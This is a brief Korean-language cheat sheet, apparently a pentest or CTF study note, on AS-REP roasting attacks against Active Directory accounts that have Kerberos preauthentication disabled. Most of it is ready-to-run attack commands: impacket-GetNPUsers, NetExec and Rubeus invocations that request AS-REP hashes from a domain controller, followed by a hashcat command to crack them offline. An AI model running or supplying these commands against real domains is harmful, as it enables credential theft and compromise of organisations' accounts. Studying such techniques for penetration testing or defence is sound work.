설명
- 공격 대상: 일반 사용자 계정 (설정 오류가 있는 계정)
- 필요 조건: 유저 네임 리스트만 있으면 시도 가능
- 핵심 취약점:
Do not require Kerberos preauthentication 옵션이 사용된 경우
- 보통 아주 오래된 프로그램과의 호환성을 위해 실수로 켜두는 경우가 많다.
공격
impacket-GetNPUsers
impacket-GetNPUsers -dc-ip $IP [domain]/[user]:[password] -request -format hashcat
impacket-GetNPUsers -dc-ip $IP [domain]/[user]:[password] -request -format john
impacket-GetNPUsers [domain]/ -dc-ip $IP -usersfile [wordlist] -format hashcat -outputfile [file] -no-pass
NetExec
nxc ldap -dc-ip $IP -u $USER -p '' --asreproast asreproast.out
nxc ldap -dc-ip $IP -u $USER -p $PWD --asreproast asreproast.out
Rubeus
rubues.exe asreproast /nowrap
# Insert 23$ after $krb5asrep$
hashcat -m 18200 -a 0 [hash] [wordlist]